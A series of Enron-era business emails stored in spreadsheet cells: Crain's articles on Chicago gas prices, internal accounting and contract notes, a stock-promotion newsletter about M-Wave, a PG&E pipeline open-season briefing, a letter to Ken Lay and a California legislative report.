----- Forwarded by Susan M Landwehr/NA/Enron on 01/14/2001 10:32 AM -----_x000D_
_x000D_
	"Fein, David I. - CHI" &lt;david.fein@piperrudnick.com&gt;_x000D_
	01/13/2001 06:03 PM_x000D_
		 _x000D_
		 To: "'Susan_M_Landwehr@enron.com'" &lt;Susan_M_Landwehr@enron.com&gt;, _x000D_
"'rboston@enron.com'" &lt;rboston@enron.com&gt;_x000D_
		 cc: "Townsend, Christopher J. - CHI" &lt;chris.townsend@piperrudnick.com&gt;_x000D_
		 Subject: Crain's - January 15, 2001_x000D_
_x000D_
Sue &amp; Roy -- We thought that you would find the attached articles regarding_x000D_
the high natural gas prices in Illinois to be of interest.  _x000D_
_x000D_
To solve gas bill crisis, turn heat up on Peoples_x000D_
Crain's Editorial - January 15, 2001_x000D_
Considering the finger-pointing that's going on between politicians,_x000D_
regulators and Peoples Energy Corp. executives, one thing is becoming_x000D_
obvious: Fixing blame for the recent astronomical rise in natural gas prices_x000D_
is much simpler than fixing the problem._x000D_
Nonetheless, all of these factions bear some responsibility for this_x000D_
winter's monthly home heating bills, which, for many residents, are soaring_x000D_
by hundreds of dollars over last winter's tabs. Each of these groups should_x000D_
be held accountable for working to devise systems and strategies designed to_x000D_
blunt future price spikes._x000D_
Make no mistake about it, this crisis will not melt away with the spring_x000D_
thaw. Limited natural gas supplies and increased demand will continue to_x000D_
pump up bills, rattle price stability and, along with other climbing energy_x000D_
rates, become the economy's unwelcome "X" factor._x000D_
The weight of dealing with these pressures rests with the utilities,_x000D_
especially Peoples Energy, the city's natural gas provider. To start with,_x000D_
the utility's management must protect customers by anticipating escalating_x000D_
demand, hedging risk and locking in gas prices when it can._x000D_
These are common business practices, used by corporations and even some_x000D_
conservative utilities. In Michigan, for example, gas providers charge fixed_x000D_
rates to customers and hedge their risk by purchasing gas years in advance_x000D_
under long-term supply contracts. Right now, Michigan pays 29 cents per_x000D_
therm, compared with the Chicago area's whopping 98 cents._x000D_
Peoples argues that it tried to lock in prices but was shot down when it_x000D_
could not reach an agreement with the Illinois Commerce Commission (ICC),_x000D_
which regulates the utility, on what the fixed rate should be. In walking_x000D_
away from the deal, Peoples left customers with the current rate system and_x000D_
dumped the burden of price fluctuations onto them._x000D_
In essence, instead of managing risk, it put its customer base at risk._x000D_
Considering that decision and the subsequent fallout, critics are asking_x000D_
whether Peoples, a regulated monopoly designed to profit from the public's_x000D_
needs, is acting in the best interest of its customers. Those paying heating_x000D_
bills - which in some cases are as much as 300% higher than last winter's -_x000D_
are right to say no, as is Mayor Richard Daley, who's outraged at Peoples._x000D_
More troubling are concerns that Peoples management may not be up to the_x000D_
challenge of resolving this crisis, especially if its recent handling of the_x000D_
political fallout is an indication. The company acts as if the public has no_x000D_
right to question its tactics or motivations. And when the Chicago City_x000D_
Council held a public hearing about the heating bills issue last week,_x000D_
Peoples Energy Chairman Richard Terry didn't show up._x000D_
At these prices, it's not asking too much for the chairman of the gas_x000D_
utility to explain his company's position. That's not a job meant for a_x000D_
public relations executive or a consultant, who were among the Peoples_x000D_
advocates who actually did attend the council hearing._x000D_
The ICC shoulders its share of the blame, too. It should have more zealously_x000D_
monitored the gas supply situation and the utility's plans. Now, the_x000D_
commission is playing catch-up by holding an investigation into what Peoples_x000D_
knew about the soaring gas prices and when it knew it._x000D_
Let's get an answer to that important question and find out once and for all_x000D_
if there is price-gouging going on._x000D_
Just as critical, however, is the need to foster a statewide regulatory_x000D_
environment that encourages gas utilities to use more hedging, storing and_x000D_
price-control strategies. If there is any ambiguity in state law about the_x000D_
utility's ability to do this, then the General Assembly should change the_x000D_
rules and open up the process._x000D_
Peoples management, regulators and politicians must get beyond the blame_x000D_
game and find a way to better insulate the public from surprise spikes in_x000D_
energy prices._x000D_
Otherwise, we're all just burning money._x000D_
_x000D_
Gas flare-up gives city hot idea: Become a utility_x000D_
But co-ops mean high risks, mild rewards_x000D_
_x000D_
Utility man: William Abolt, head of Chicago's Department of the Environment,_x000D_
is examining ways to cut residents' natural gas bills. One option: opening a_x000D_
city-owned buying co-op. Photo: Steve Leonard   _x000D_
January 15, 2001_x000D_
By Steve Daniels &lt;mailto:sdaniels@crain.com&gt;_x000D_
It's easier said than done._x000D_
That's something an angry and frustrated Mayor Richard Daley is about to_x000D_
learn as his staff begins investigating plans to take on some gas-purchasing_x000D_
duties on behalf of city residents._x000D_
Mr. Daley is livid over what he contends is Peoples Energy Corp.'s failure_x000D_
to anticipate the rising cost of natural gas, to mitigate a huge run-up in_x000D_
residents' monthly heating bills this winter. He thinks the city can aid_x000D_
bill-payers, and punish Peoples, by developing a system that will funnel_x000D_
lower-cost gas to ratepayers._x000D_
But the track record of other municipal gas utilities, or buying_x000D_
cooperatives, shows that such a system isn't likely to achieve more than_x000D_
modest rate savings unless the city is willing to take on significant_x000D_
financial risks._x000D_
To protect against the kind of price spikes that have hit customers this_x000D_
winter, the city would have to buy futures, or long-term contracts, that_x000D_
could leave it exposed if prices were to decline substantially._x000D_
In addition, the city would have to contend with thorny issues such as the_x000D_
collection of overdue bills and potential cutoffs of service to non-paying_x000D_
customers - activities for which municipalities are ill-suited._x000D_
Despite the risks, utility critics contend that city intervention is_x000D_
appropriate._x000D_
"It's a creative approach, and we need those," says Martin R. Cohen,_x000D_
executive director of the Citizens Utility Board, a consumer watchdog group._x000D_
"These are extreme times, and innovative approaches are called for."_x000D_
Most municipalities that have gotten into the gas-buying business have been_x000D_
unwilling to enter into long-term, fixed-price contracts that can shield_x000D_
consumers against the sort of price spikes that have sent this year's_x000D_
home-heating bills soaring nearly 300% compared with last year's. That's_x000D_
because such arrangements can boomerang on customers, locking them into_x000D_
higher-than-market gas costs if prices fall._x000D_
New York experience_x000D_
"We wrestled with this: Should government really be in this business?" says_x000D_
David Fountaine, village administrator in Hamburg, N.Y., a suburb of Buffalo_x000D_
that formed a buying group for its residents in April 1999. "In our case, by_x000D_
being in it, we've helped our residents."_x000D_
Hamburg and nearby Sloan, N.Y., together hired a unit of Texaco Inc. to_x000D_
supply gas to residents who signed up for the communities' program. New York_x000D_
opened its natural gas market to competition five years ago, so residents_x000D_
can choose either to remain with their gas utility or select an outside_x000D_
marketer._x000D_
About one-third of Hamburg's 3,300 households buy gas from the village._x000D_
Those residents' gas bills last winter were 8% lower than the bills of_x000D_
households that stayed with Buffalo gas utility National Fuel Gas Co. Last_x000D_
month, when gas prices shot up, the village's price was 15% lower than the_x000D_
utility's._x000D_
But Mr. Fountaine says the village takes no outsized risks, making no_x000D_
long-term bets on the direction of gas prices. Rather, it simply relies on_x000D_
its contractor to manage gas supplies as efficiently as possible._x000D_
Chicago officials are looking at programs like the one in the Buffalo area,_x000D_
but also may be willing to take bigger risks to achieve greater savings._x000D_
"We know there are a lot of relatively new risk-management techniques being_x000D_
used by large (natural gas) consumers," says William Abolt, commissioner of_x000D_
the city's Department of Environment. "We want to know, what does the_x000D_
industry do to manage (price) risk? That's what the reasonable company does,_x000D_
but that's not what the local gas company does."_x000D_
City officials need look no further than Downstate, where the Illinois_x000D_
Municipal Gas Agency buys natural gas on behalf of 20 communities that_x000D_
provide monopoly gas service to their residents. Last September, the agency_x000D_
locked in prices for 50% to 75% of their customers' winter gas needs,_x000D_
rolling with the market for the remainder._x000D_
That strategy is serving the agency's customers well. They're paying around_x000D_
70 cents per therm - the measurement the gas industry uses for billing -_x000D_
this month, compared with the 98 cents per therm that Peoples is charging_x000D_
Chicago-area customers._x000D_
"There's no reason why investor-owned utilities couldn't do the same thing,"_x000D_
says John Bell, the Municipal Gas Agency's general manager. "I think (a city_x000D_
program) is a viable alternative if they don't like what they've got."_x000D_
For its part, Peoples supports the city's desire to become involved in the_x000D_
market. The move poses no threat to the utility because it doesn't profit on_x000D_
gas purchases and still would make money on the delivery of the gas to_x000D_
customers._x000D_
Meanwhile, the city is just beginning to consider alternatives. Although Mr._x000D_
Abolt says no system will be developed in time to help Chicagoans during_x000D_
this trying season, a program most likely will be launched next winter._x000D_
Weighing the risks_x000D_
The city's top priority will be to help low-income residents most vulnerable_x000D_
to escalating heating bills, but all Chicago residents might be able to_x000D_
choose between the city's program or remaining with Peoples. And one_x000D_
possibility being considered would enable residents to choose either a fixed_x000D_
price for gas before winter starts or rates that rise and fall with the_x000D_
market._x000D_
While a fixed-price approach certainly looks good in hindsight right now, it_x000D_
can have a downside if not managed properly._x000D_
In the Buffalo area, the two major private gas marketers offering fixed_x000D_
prices to households recently dropped out of the residential market, forcing_x000D_
some 23,000 customers to scramble back to the local utility for gas service._x000D_
To meet the unanticipated demand, the utility was forced to purchase gas on_x000D_
the sky-high spot market._x000D_
It just such risks that Chicago officials are weighing. Says Mr. Abolt:_x000D_
"This is not an overnight thing. You don't just snap your fingers and it_x000D_
happens."_x000D_
_x000D_
_x000D_
David I. Fein_x000D_
Piper Marbury Rudnick &amp; Wolfe_x000D_
203 N. LaSalle Street_x000D_
Suite 1800_x000D_
Chicago, Illinois  60601_x000D_
(W) 312-368-3462_x000D_
(F) 312-630-7418_x000D_
e-mail:  david.fein@piperrudnick.com_x000D_
_x000D_
PLEASE NOTE THAT MY E-MAIL ADDRESS HAS CHANGED TO REFLECT THE MERGER OF_x000D_
PIPER &amp; MARBURY AND RUDNICK &amp; WOLFE_x000D_
 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_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 Jan 2002 07:38:32 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'martha.stevens@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'clara.carrington@enron.com'})</t>
  </si>
  <si>
    <t>Argentina Gas Firm Books</t>
  </si>
  <si>
    <t>Clara,_x000D_
_x000D_
Per our telephone discussion, as of today, please remove the following two Argentina Gas Books from the cash flow calculations.  Due to the economic_x000D_
uncertainty and peso devaluation, we will be treating these transactions on an accrual basis.  I will continue to value and officialize the books daily for Credit._x000D_
_x000D_
	EI-ARG-GAS-TRSP-PRC_x000D_
	EI-ARG-GAS-PRC_x000D_
_x000D_
Please give me a call if you have questions._x000D_
_x000D_
Thanks!_x000D_
Martha</t>
  </si>
  <si>
    <t>Revised EEI Terms for SMUD</t>
  </si>
  <si>
    <t xml:space="preserve">Shari,_x000D_
_x000D_
Attached please find the REVISED credit terms for a draft EEI Master Power _x000D_
Purchase &amp; Sale Agreement between EPMI and Sacramento Municipal Utility _x000D_
District.  Please call with any questions to the aforementioned._x000D_
_x000D_
Regards,_x000D_
Tracy_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 16:45:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bounce-smallcapdigest-95352d@lyris.smallcapnetwork.net'})</t>
  </si>
  <si>
    <t>Are P/E's Still Too High?</t>
  </si>
  <si>
    <t>_x000D_
If you are reading this message in plaintext or if you have an AOL address =_x000D_
you must click on this link: http://www.smallcapnetwork.net/archive/listser=_x000D_
v/20011026-2.html  and wait for a web page to automatically open up to prop=_x000D_
erly read this newsletter.=20_x000D_
   [IMAGE]     VOLUME 01: ISSUE 08 [IMAGE]  [IMAGE] [IMAGE]   [IMAGE]  [IMA=_x000D_
GE]   [IMAGE] Dow Jones 9,545.17 + 82.27 7:40 pm EST, Fri., October 26, 200=_x000D_
1 [IMAGE] NASDAQ 1,768.96 -  6.51 For info, visit www.smallcapnetwork.net  =_x000D_
[IMAGE] S &amp; P 500 1,104.61 + 4.52 To be removed, please click here . [IMAGE=_x000D_
] Russell 2000   438.65  + 2.69      [IMAGE] Dear SmallCap Network Members:=_x000D_
  Wall Street pros continue a rather heated debate over market valuations, =_x000D_
with battle results unfolding with each and every twist and turn of the pop=_x000D_
ular averages. Are price-to-earnings (P/E) multiples on the broad market st=_x000D_
ill too high? We continue to do considerable research on this subject, and =_x000D_
have some good news and bad news to report.  Let's get the bad news out of =_x000D_
the way first. By historical measures, current broad market value remains r=_x000D_
elatively high. The P/E ratio on the S&amp;P 500 has averaged 15 times earnings=_x000D_
 over the past 40 years. Today, the earnings multiple on the S&amp;P 500 stands=_x000D_
 at just over 29 times and is projected at 21 times next year's consensus e=_x000D_
arnings forecast.  At the recent September 21 low-water mark of 965.80, the=_x000D_
 P/E multiple on the S&amp;P 500 got down to 25.6 times, still well above the 4=_x000D_
0-year average. What most Wall Street firms are reluctant to tell is the fa=_x000D_
ct that the average P/E multiple at bear-market bottoms over the past 50 ye=_x000D_
ars has been 11 times earnings.  This is hardly reassuring if you consider =_x000D_
yourself more bull than bear.  That's as far as we're going with the bad ne=_x000D_
ws. Suffice it to say we are reluctantly bullish, so let's get to some good=_x000D_
 news. First, the five-year high P/E multiple on the S&amp;P 500 was 50.16. (We=_x000D_
 were unable to confirm this, but believe this could represent an historic =_x000D_
all-time high.) Fortunately, this P/E multiple was achieved at about the sa=_x000D_
me time many fledgling (and now-defunct) Internet start-ups were trading at=_x000D_
 50-100 times SALES not earnings.   [IMAGE]  The low P/E multiple on the S&amp;=_x000D_
P 500 was 17.48 times earnings a full five years ago. The broad market was =_x000D_
in an advance that saw it double from October of 1996 to March of 2000 befo=_x000D_
re crashing 40% from its peak. The P/E on the S&amp;P was cut in half by the ti=_x000D_
me it hit its September 21 low. While there continues to be downside risk, =_x000D_
this has to be considered pretty good news going forward.  The good news fo=_x000D_
r individual investors doesn't end there. Over the past 40 years inflation =_x000D_
has run at an average of 4.4% but is holding steady at 2% today. The averag=_x000D_
e yield on 10-year Treasury notes during the same period is 7.3% but today =_x000D_
the yield is down to just 4.6%. Combine this with the fact that money marke=_x000D_
t funds hold around $2 trillion in cash (versus an $11 trillion total marke=_x000D_
t capitalization) and the outlook for stocks begins to brighten just a bit.=_x000D_
  Whether P/E's continue to contract, hold steady, or expand is really a fu=_x000D_
nction of earnings performance going forward. Estimates for 2002 earnings o=_x000D_
n the S&amp;P 500 have continued to contract as the economic slowdown drags on.=_x000D_
 The challenge for the 500 companies that make up the S&amp;P average will be t=_x000D_
o beat those reduced estimates next year. With the threat of inflation unde=_x000D_
r control and interest rates at a 40-year low, large-cap corporate America =_x000D_
has an excellent foundation to produce some positive surprises next year.  =_x000D_
The challenge for the individual investor is to find opportunities for grow=_x000D_
th in a marketplace littered with growth-stock casualties. This is also why=_x000D_
 many Wall Street professionals have singled out micro and small cap value =_x000D_
stocks to out-perform the broad market over the next 12-18 months. Why? Bec=_x000D_
ause they are under-followed and many of them are considerably undervalued!=_x000D_
  AN UNDER-VALUED MICRO CAP STOCK IN REVIEW  One company we've uncovered th=_x000D_
at represents a solid speculative micro cap value is M-Wave, Inc. (NASDAQ: =_x000D_
MWAV .) MWAV manufactures microwave frequency components and high-frequency=_x000D_
 circuit boards using Teflon-based laminates. These products are widely use=_x000D_
d in variety of applications for wireless telecommunications and Internet s=_x000D_
ervice products.  For the six-month period ending 6/30/01, MWAV's revenues =_x000D_
totaled $38 million up from $17.3 million while net income rose to $2.8 mil=_x000D_
lion from $926 thousand. With no known analyst coverage, MWAV is trading at=_x000D_
 a market capitalization of about $19 million-just 1/3 of last year's $57 m=_x000D_
illion in revenues.  Even more intriguing from a valuation standpoint, MWAV=_x000D_
 currently trades at 3.28 times trailing 12-month earnings and just a shade=_x000D_
 over 1x book value. The Company announced revenues were on track to exceed=_x000D_
 last year's levels, and they project $100 million in revenues in the next =_x000D_
two to three years.  Some investors may shy away from companies in this gro=_x000D_
up because they have been pummeled over the past year and a half. Regardles=_x000D_
s of its past performance of its stock price, MWAV's revenue growth is proj=_x000D_
ected to grow by over 75% in the next two to three years. MWAV shareholders=_x000D_
 have excellent upside potential from current levels. In fact, according to=_x000D_
 the NASDAQ, three new institutional shareholders have reported adding new =_x000D_
positions in MWAV over the past six months.  The fundamentals look pretty s=_x000D_
olid going forward. Let's take a look at the technical outlook. The chart b=_x000D_
elow highlights MWAV shares trading at a $15 high as late as February. When=_x000D_
 the market peaked in 2000, MWAV shares hit an all-time high of $16.94. MWA=_x000D_
V hit a closing yearly low of $3.70 on September 20, 2000.   [IMAGE]  Share=_x000D_
s of MWAV represent a very good value for speculative investors at current =_x000D_
levels. Downside risk of about 15% appears to be buffeted by the $3.80 book=_x000D_
 value of the Company. The $19 million market cap represents just 20% of an=_x000D_
ticipated forward revenues of $100 million whether it takes two to three ye=_x000D_
ars get there.  We believe MWAV has an excellent opportunity to hit their r=_x000D_
evenue goal and see their market cap expand to 1x revenues at some point in=_x000D_
 the next two to three years. In fact, if the Company were to reach a reven=_x000D_
ue valuation of 1x on a trailing basis, a 300% return from today's closing =_x000D_
price would be realized. On a worst-case scenario, MWAV shares appear to ho=_x000D_
ld 15-20% downside risk.  The SmallCap Network believes MWAV has an excelle=_x000D_
nt chance to retest its all-time high IF they achieve the revenue results t=_x000D_
hey have publicly stated they are targeting. With 4.57 million shares outst=_x000D_
anding, achieving a $100 million market cap would produce a $21.88 share pr=_x000D_
ice at some point in the next two to three years.  In our view, 400% upside=_x000D_
 potential versus 20% downside represents a risk/reward scenario (20-1) we =_x000D_
are perfectly willing to live with regardless of whether the broad market i=_x000D_
s over, under, or fairly valued. We'll look forward to presenting more of t=_x000D_
hese types of situations in the weeks and months ahead.  SmallCap Network M=_x000D_
embers are advised this is neither an offer to sell nor a solicitation to b=_x000D_
uy securities. Members are advised to perform their own due diligence and u=_x000D_
se caution when buying andselling micro and small cap stocks.  If you'd lik=_x000D_
e to update, change, or add a new email address please click here .    [IMA=_x000D_
GE]    D I S C L A I M E R :  The SmallCap Digest is an independent electro=_x000D_
nic publication committed to providing our readers with factual information=_x000D_
 on selected  publicly traded companies. SmallCap Digest is not a registere=_x000D_
d investment advisor or broker-dealer. All companies are chosen on the basi=_x000D_
s of certain financial analysis and other pertinent criteria with a view to=_x000D_
ward  maximizing the upside potential for investors while minimizing the do=_x000D_
wnside risk, whenever possible.  Moreover, as detailed below, this publicat=_x000D_
ion accepts compensation from third party consultants and/or companies whic=_x000D_
h it features for the publication and circulation of the SmallCap Digest or=_x000D_
 representation on SmallCapNetwork.net.  Likewise, this newsletter is owned=_x000D_
 by TGR, LLC.  To the degrees enumerated herein,  this newsletter should no=_x000D_
t be regarded as an independent publication.   Click Here  to view our comp=_x000D_
ensation on every company we have ever covered, or visit the following web =_x000D_
address:  http://www.smallcapdigest.net/compensation_disclosure.html  for o=_x000D_
ur full compensation disclosure and http://www.smallcapdigest.net/short_ter=_x000D_
m_alerts.html  for Trading Alerts compensation and disclosure.   All statem=_x000D_
ents and expressions are the sole  opinions of the editors and are subject =_x000D_
to change without notice. A profile, description, or other mention of a com=_x000D_
pany in the newsletter is neither an offer nor solicitation to buy or sell =_x000D_
any securities  mentioned. While we believe all sources of information to b=_x000D_
e factual and reliable, in no way do we represent or guarantee the accuracy=_x000D_
 thereof, nor the statements made herein.   The editor, members of the edit=_x000D_
or's family, and/or entities with  which the editor is affiliated, are forb=_x000D_
idden by company policy to own, buy, sell or otherwise trade stock for thei=_x000D_
r own benefit in the companies who appear in the publication. The profiles,=_x000D_
 critiques, and other editorial content of the SmallCap Digest and SmallCap=_x000D_
Network.net may contain forward-looking statements relating to the expected=_x000D_
 capabilities of the companies mentioned herein.   THE READER SHOULD VERIFY=_x000D_
 ALL CLAIMS AND DO THEIR OWN DUE DILIGENCE BEFORE INVESTING IN ANY SECURITI=_x000D_
ES MENTIONED. INVESTING IN  SECURITIES IS SPECULATIVE AND CARRIES A HIGH DE=_x000D_
GREE OF RISK. THE INFORMATION FOUND IN THIS PROFILE IS PROTECTED BY THE COP=_x000D_
YRIGHT LAWS OF THE UNITED STATES AND MAY NOT BE COPIED, OR REPRODUCED IN AN=_x000D_
Y WAY WITHOUT THE EXPRESSED, WRITTEN  CONSENT OF THE EDITORS OF SMALLCAPNET=_x000D_
WORK.NET.   We encourage our readers to invest carefully and read the inves=_x000D_
tor information available at the web sites of  the Securities and Exchange =_x000D_
Commission ("SEC") at http://www.sec.gov and/or the National Association of=_x000D_
 Securities Dealers ("NASD") at http://www.nasd.com . We also strongly reco=_x000D_
mmend that you read the SEC advisory to investors concerning Internet Stock=_x000D_
 Fraud, which can be found at  http://www.sec.gov/consumer/cyberfr.htm . Re=_x000D_
aders can review all public filings by companies at the SEC's EDGAR page. T=_x000D_
he NASD has published information on how to invest carefully at its web sit=_x000D_
e.   =09_x000D_
_x000D_
  --- You are currently subscribed to smallcapdigest as: alewis@ect.enron.c=_x000D_
om To unsubscribe send a blank email to leave-smallcapdigest-95352D@lyris.s=_x000D_
mallcapnetwork.net</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 09:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: More Info: PG&amp;E to Announce Open Season on Redwood and Baja_x000D_
 Early Next Week</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.  Apologies for the oversight of not including you on the list.  If you _x000D_
have any questions, etc. just give a holler (415.782.7822)._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
From: Jeff Dasovich on 05/18/2001 12:24 PM_x000D_
Sent by: Jeff Dasovich_x000D_
To: Stephanie Miller/Enron@EnronXGate, Barry Tycholiz/Enron@EnronXGate, Chris _x000D_
H Foster/Enron@EnronXGate, Jeffery Fawcett/Enron@EnronXGate, Steven _x000D_
Harris/ET&amp;S/Enron@ENRON, Leslie Lawner/NA/Enron@Enron, Rebecca W _x000D_
Cantrell/HOU/ECT@ECT, skean@enron.com, Richard Shapiro/NA/Enron@Enron, James _x000D_
D Steffes/NA/Enron@Enron, Susan J Mara/NA/Enron@ENRON, Sandra _x000D_
McCubbin/NA/Enron@Enron, Donna Fulton/Corp/Enron@ENRON, Joe _x000D_
Hartsoe/Corp/Enron@ENRON, Shelley Corman/Enron@EnronXGate, Julie A _x000D_
Gomez/Enron@EnronXGate, Laird Dyer/SF/ECT@ECT, Michael McDonald/SF/ECT@ECT, _x000D_
David Parquet/SF/ECT@ECT, Samuel Wehn/HOU/ECT@ECT, Alan _x000D_
Comnes/Enron@EnronXGate, Christopher F Calger/Enron@EnronXGate, Tim _x000D_
Belden/Enron@EnronXGate, Robert Badeer/Enron@EnronXGate, Paul _x000D_
Kaufman/Enron@EnronXGate_x000D_
cc:  _x000D_
_x000D_
Subject: More Info: PG&amp;E to Announce Open Season on Redwood and Baja Early _x000D_
Next Week_x000D_
_x000D_
PG&amp;E will announce via press release very early next week an open season on _x000D_
Redwood, Baja and Silverado._x000D_
It comes in direct response to recent announcements of expansions into _x000D_
California by pipelines._x000D_
The bid protocols will be structured similar to original open season from the _x000D_
original Gas Accord._x000D_
The open season will start on June 1 and end on July 31._x000D_
Capacity will be available starting 1.1.03._x000D_
Bidders will be able to bid up to 30 years (PG&amp;E states that that's what _x000D_
generators want)._x000D_
Accompanying the announcement will be another announcement that PG&amp;E will _x000D_
expand Redwood by 200mmcf/day, which they hope to have available by 1.1.03, _x000D_
or some time during Q103._x000D_
About 2-4 weeks after the open season begins, PG&amp;E will file its proposed _x000D_
"Gas Accord II,"  (the first one expires end of 02)._x000D_
As part of that filing, PG&amp;E will offer its proposed ratemaking treatment for _x000D_
the next five years (beginning 1.1.03)._x000D_
PG&amp;E will not include in the open season 1) core capacity and 2) certain EAD _x000D_
contracts that extend beyond the Gas Accord 1 end date._x000D_
In addition, PG&amp;E will hold back an additional 20% (after excluding core and _x000D_
EAD), to be "open-seasoned" at some "future" date._x000D_
The capacity to be auctioned is: 1) 900 mmcf/day on Redwood, 2) 245 (annual) _x000D_
on Baja, plus an additional 200/day in summer on Baja, 3) 155 on Silverado._x000D_
How PG&amp;E will market the 20% they intend to hold back, and when they might _x000D_
auction it off in the future will be discussed in PG&amp;E's Gas Accord II filing._x000D_
No single company will be awarded more than 30% of the capacity on any _x000D_
specific path in the primary open season (though firms can bid whatever level _x000D_
of capacity they choose)._x000D_
_x000D_
Please forwad along to anyone else who might be interested.  If you have any _x000D_
questions, just holler._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 09:54:10 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cphillabaum@yahoo.com'})</t>
  </si>
  <si>
    <t>Carol Phillabaum_x000D_
567 Palisade Ave_x000D_
Teaneck, NJ 07666_x000D_
cphillabaum@yahoo.com_x000D_
_x000D_
To Mr. Ken Lay,_x000D_
_x000D_
I'm writing to urge you to donate the millions of dollars you made from_x000D_
selling Enron stock before the company declared bankruptcy to funds,_x000D_
such as Enron Employee Transition Fund and REACH, that benefit the_x000D_
company's employees, who lost their retirement savings, and provide_x000D_
relief to low-income consumers in California, who can't afford to pay their_x000D_
energy bills.  Enron and you made millions out of the pocketbooks of_x000D_
California consumers and from the efforts of your employees._x000D_
_x000D_
Indeed, while you netted well over a $100 million, many of Enron's_x000D_
employees were financially devastated when the company declared_x000D_
bankruptcy and their retirement plans were wiped out.  And Enron made_x000D_
an astronomical profit during the California energy crisis last year.  As a_x000D_
result, there are thousands of consumers who are unable to pay their_x000D_
basic energy bills and the largest utility in the state is bankrupt._x000D_
_x000D_
The New York Times reported that you sold $101 million worth of Enron_x000D_
stock while aggressively urging the company's employees to keep_x000D_
buying it.  Please donate this money to the funds set up to help repair_x000D_
the lives of those Americans hurt by Enron's underhanded dealings._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Carol Phillabaum</t>
  </si>
  <si>
    <t>Wed, 25 Jul 2001 11:11:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bill.williams@enron.com', 'amy.fitzpatrick@enron.com'})</t>
  </si>
  <si>
    <t>REMINDER: Real Time interview today--Jake Arnold (9 am, Adams)</t>
  </si>
  <si>
    <t>Jake Arnold is scheduled to interview for the Real Time position today, at 9am in Mt. Adams. Please see the schedule below for more information:_x000D_
_x000D_
	9:00am - Amy FitzPatrick_x000D_
	9:45am - Bill Williams III_x000D_
_x000D_
If you have any questions, let me know!_x000D_
_x000D_
Thanks,_x000D_
Grace_x000D_
x8321</t>
  </si>
  <si>
    <t>Tue, 31 Oct 2000 07:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Bob_x000D_
Yes that's right - although it should all be done now, although I had a call _x000D_
saying they hadn't received the doc , although I did courier it round._x000D_
Unfortunately I am having to work from home today because of flooding in _x000D_
south of England - so I can't check the file - but will do so as soon as I _x000D_
get back to the office_x000D_
Michael_x000D_
_x000D_
_x000D_
_x000D_
To: michael.slade@enron.com_x000D_
cc: Tana Jones/HOU/ECT@ECT _x000D_
_x000D_
Subject: GFI Non disclosure_x000D_
_x000D_
I am working with Andy Zipper on the Broker Client application.  I talked to _x000D_
Colin Hefron at GFI and his attorney is apparently working with you on the _x000D_
Non Disclosure Agreement.  Please let me know the status so that I can move _x000D_
forward on discussions with GFI.  My number is 713 853-0397._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 08:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jmball@ns.net'})</t>
  </si>
  <si>
    <t>frozenset({'steven@iepa.com', 'smutny@iepa.com', 'kaplan@iepa.com'})</t>
  </si>
  <si>
    <t>Legislative Status Report Week Ending 4/20</t>
  </si>
  <si>
    <t>Date: 4/20/01_x000D_
To: Jan Smutny-Jones, Steven Kelly, Katie Kaplan_x000D_
Cc: IEP Board of Directors_x000D_
From: Julee Malinowski-Ball, Edson + Modisette_x000D_
RE: Legislative Status Report Week Ending 4/20_x000D_
_x000D_
_x000D_
RECENT EVENTS:_x000D_
_x000D_
-- IEP with the help of Chris Ellison has been at the negotiating table mos=_x000D_
t_x000D_
of the week dealing with the most recent amendments to SB 28x.  SB 28x_x000D_
(Sher/Battin) makes various changes to the siting process including many_x000D_
IEP-sponsored proposals.  As you will recall, two new provisions were added_x000D_
to the bill at the last minute before going to the Assembly Floor dealing_x000D_
with both retrofit schedules and environmental dispatch of generating_x000D_
facilities.  Per the direction from IEP member companies, IEP has decided_x000D_
not to negotiate on the environmental dispatch issue. If the provision_x000D_
remained in the bill, IEP would continue to push the Republicans to hold_x000D_
their opposed position. We were, however, given the authority to negotiate_x000D_
on the retrofit issue as long as we were only talking about facilities that_x000D_
already have retrofit requirements.  I will be faxing out the agreed upon_x000D_
language which in essence says the ARB shall set a schedule for the_x000D_
completion of any mandated retrofits.  It does not expand the authority of_x000D_
the air districts and ARB to mandate retrofits under existing law. The_x000D_
schedule would require completion of the retrofits by July 1, 2004 or such_x000D_
later date as the ISO determines is necessary to maintain reliability._x000D_
_x000D_
With these amendments, including some clean-up language, SB 28x will be_x000D_
voted-on on the Assembly floor on Monday and go to the Senate for_x000D_
concurrence on Tuesday.  The final version will include the following_x000D_
IEP-sponsored proposals:_x000D_
_x000D_
? Conforming the timing of offsets for power plants to Clean Air Act_x000D_
requirements_x000D_
? Substituting CEQA-style hearings for the trial-like proceedings of the CE=_x000D_
C_x000D_
? Streamlining the permit process for the modernization of existing power_x000D_
plant sites_x000D_
? Giving consideration to the positive environmental impacts of a proposed_x000D_
project._x000D_
? Improving the timeliness and coordination of state and local agency_x000D_
review._x000D_
? Extending the current deadlines for the expedited review process_x000D_
established in AB 970._x000D_
_x000D_
Since SB 28x is only a first step in making changes to the siting process,_x000D_
IEP member should now be thinking about what is next.  IEP proposals still_x000D_
on the table include:_x000D_
_x000D_
? Permitting local agencies to make zoning changes or other decisions for_x000D_
power plants contingent upon CEC CEQA Compliance_x000D_
? Giving deference to other state and regional agencies_x000D_
? Easing the threshold for override of local land use requirements._x000D_
? Making the ISO responsible for determining interconnection requirements_x000D_
_x000D_
-- Bad news on the =01&amp;California First=018 issue quickly followed the good=_x000D_
 news._x000D_
The CEC staff analysis which said the State can't require builders of new_x000D_
power plants to sell electricity here, even as a trade-off for expedited_x000D_
permitting, was countered by another staff analysis that says the state can=_x000D_
._x000D_
